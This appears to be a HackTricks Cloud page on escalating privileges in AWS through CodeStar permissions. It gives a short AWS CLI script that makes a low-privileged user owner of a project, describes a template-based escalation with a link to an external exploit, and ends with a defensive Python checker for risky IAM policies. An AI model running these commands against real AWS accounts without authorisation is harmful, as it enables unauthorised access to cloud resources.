# AWS - Codestar Privesc

{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## Codestar

You can find more information about CodeStar in:

{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
{% endcontent-ref %}

### `iam:PassRole`, `codestar:CreateProject`

With these permissions you can **abuse a CodeStar IAM role** to perform **arbitrary actions** through a **CloudFormation template**. Check the following page:

{% content-ref url="iam-passrole-codestar-createproject.md" %}
[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md)
{% endcontent-ref %}

### `codestar:CreateProject`, `codestar:AssociateTeamMember`

This technique uses `codestar:CreateProject` to create a CodeStar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of the new CodeStar **project**, which grants them a **new policy with a few extra permissions**.

```bash
PROJECT_NAME="supercodestar"

# Create the project with the low-privileged profile
aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
    --name "$PROJECT_NAME" \
    --id "$PROJECT_NAME"

echo "Waiting 1min to start the project"
sleep 60

# Look up the ARN of the calling IAM user
USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

# Associate that user with the project as Owner
aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
    --project-id "$PROJECT_NAME" \
    --user-arn "$USER_ARN" \
    --project-role "Owner" \
    --remote-access-allowed
```

If you are already a **member of the project**, you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`.

**Potential Impact:** Privesc to the codestar policy generated.
You can find an example of that policy in:

{% content-ref url="codestar-createproject-codestar-associateteammember.md" %}
[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md)
{% endcontent-ref %}

### `codestar:CreateProjectFromTemplate`

1. **Create a New Project:**
   * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
   * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
   * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role.
2. **Update the Target Stack:**
   * With the granted CloudFormation permissions, proceed to update the specified stack.
   * The stack's name will typically conform to one of two patterns:
     * `awscodestar--infrastructure`
     * `awscodestar--lambda`
   * The exact name depends on the chosen template (referencing the example exploit script).
3. **Access and Permissions:**
   * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
   * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.

For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)

**Potential Impact:** Privesc to cloudformation IAM role.
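
For reviewing your own account, the permission sets named in the three sections above can be checked against IAM policy documents, wildcards included. This is an added example, not code from HackTricks or the Rhino Security Labs research; the function names and sample policies are constructed, and it assumes only `Allow`/`Action` entries matter (it ignores `Deny`, `NotAction`, `Resource`, `Condition`, permission boundaries and SCPs).

```python
import fnmatch

# Permission sets this page lists as CodeStar escalation paths.
RISKY_SETS = {
    "PassRole+CreateProject": {"iam:PassRole", "codestar:CreateProject"},
    "CreateProject+AssociateTeamMember": {"codestar:CreateProject",
                                          "codestar:AssociateTeamMember"},
    "UpdateTeamMember (needs existing membership)": {"codestar:UpdateTeamMember"},
    "CreateProjectFromTemplate": {"codestar:CreateProjectFromTemplate"},
}

def allowed_patterns(policy_docs):
    """Collect Action patterns from every Allow statement."""
    patterns = []
    for doc in policy_docs:
        statements = doc.get("Statement", [])
        if isinstance(statements, dict):      # a single statement may be a bare object
            statements = [statements]
        for stmt in statements:
            if stmt.get("Effect") != "Allow":
                continue
            actions = stmt.get("Action", [])  # absent when the statement uses NotAction
            patterns += [actions] if isinstance(actions, str) else list(actions)
    return patterns

def grants(patterns, action):
    """IAM action names are case-insensitive; '*' and '?' act as wildcards."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def risky_paths(policy_docs):
    """Names of the escalation paths fully covered by the Allow statements."""
    patterns = allowed_patterns(policy_docs)
    return sorted(name for name, needed in RISKY_SETS.items()
                  if all(grants(patterns, a) for a in needed))

# Constructed sample policies for illustration.
DEVELOPER = [{"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Resource": "*",
     "Action": ["codestar:Create*", "codestar:AssociateTeamMember"]},
    {"Effect": "Allow", "Resource": "*", "Action": "s3:GetObject"}]}]
READ_ONLY = [{"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "Resource": "*",
    "Action": ["codestar:List*", "codestar:Describe*"]}}]

if __name__ == "__main__":
    for name, docs in (("developer", DEVELOPER), ("read-only", READ_ONLY)):
        print(name, risky_paths(docs))
```

Pass it every policy document attached to one principal (inline, managed and group policies together), since a risky set can be split across documents.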